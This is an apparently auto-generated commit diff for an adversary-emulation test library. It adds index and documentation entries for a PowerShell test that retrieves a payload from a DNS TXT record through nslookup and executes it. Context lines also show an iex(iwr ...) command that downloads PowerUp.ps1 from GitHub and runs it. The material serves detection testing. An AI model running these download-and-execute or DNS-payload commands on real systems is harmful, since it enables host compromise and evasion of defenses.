Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -689,6 +689,7 @@ execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,ATHPowerShe
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,22,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
 execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
 execution,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -520,6 +520,7 @@ execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,ATHPowerShe
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,22,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
 execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
 execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
 execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -1069,6 +1069,7 @@
   - Atomic Test #19: PowerShell Command Execution [windows]
   - Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
   - Atomic Test #21: PowerUp Invoke-AllChecks [windows]
+  - Atomic Test #22: Abuse Nslookup with DNS Records [windows]
 - T1170 Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
   - Atomic Test #1: Create Systemd Service and Timer [linux]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -799,6 +799,7 @@
   - Atomic Test #19: PowerShell Command Execution [windows]
   - Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
   - Atomic Test #21: PowerUp Invoke-AllChecks [windows]
+  - Atomic Test #22: Abuse Nslookup with DNS Records [windows]
 - T1170 Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/index.yaml

@@ -46456,6 +46456,22 @@ execution:
           iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
           Invoke-AllChecks
         name: powershell
+    - name: Abuse Nslookup with DNS Records
+      auto_generated_guid: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1
+      description: 'Red teamer''s avoid IEX and Invoke-WebRequest in your PowerShell
+        commands. Instead, host a text record with a payload to compromise hosts.
+
+        '
+      supported_platforms:
+      - windows
+      reference: https://twitter.com/jstrosch/status/1237382986557001729
+      executor:
+        command: |
+          # creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
+          # this would not be part of a real attack but helpful for this simulation
+          function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
+          powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
+        name: powershell
   T1170:
     technique:
       x_mitre_platforms:

atomics/T1059.001/T1059.001.md

@@ -52,6 +52,8 @@ PowerShell commands/scripts can also be executed without directly invoking the <
 
 - [Atomic Test #21 - PowerUp Invoke-AllChecks](#atomic-test-21---powerup-invoke-allchecks)
 
+- [Atomic Test #22 - Abuse Nslookup with DNS Records](#atomic-test-22---abuse-nslookup-with-dns-records)
+
 
 <br/>
 
@@ -874,4 +876,35 @@ Invoke-AllChecks
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #22 - Abuse Nslookup with DNS Records
+Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 999bff6d-dc15-44c9-9f5c-e1051bfc86e1
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
+# this would not be part of a real attack but helpful for this simulation
+function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
+powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
+```
+
+
+
+
+
+
 <br/>